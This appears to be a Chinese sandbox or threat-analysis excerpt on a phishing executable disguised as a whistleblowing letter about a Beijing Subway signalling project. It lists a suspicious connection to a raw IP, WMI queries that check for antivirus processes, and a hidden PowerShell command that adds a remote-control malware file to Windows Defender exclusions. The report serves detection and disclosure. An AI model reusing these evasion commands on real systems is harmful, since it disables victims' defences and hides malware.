- 北京地铁运营公司-基于自主定位和自主感知的信号备用系统研究项目举报函.exe
复制代码 检测到高危ip地址:
suspicious_request:
GET https://49.233.11.247/api/xxx
suspicious_features:
Connection to IP address
检测到不合理脚本:
Subsystem:
Windows command line
http2clienthttp2serverarchive/tartls10servercrypto/x509archive/zipClassHESIODkernel32.dll
针对杀毒软件的检测:
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '360TRAY.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'HIPSLOG.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'QQPCRTP.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'HIPSDAEMON.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'QQPCTRAY.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'HIPSTRAY.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'HIPSMAIN.EXE'
wmi:
SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'HUORONG.EXE'
添加文件到杀软白名单的iusb3mon远控恶意脚本:
pid:
1688
command_line:
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Administrator\AppData\Local\AppData\iusb3mon.exe' -Force"
|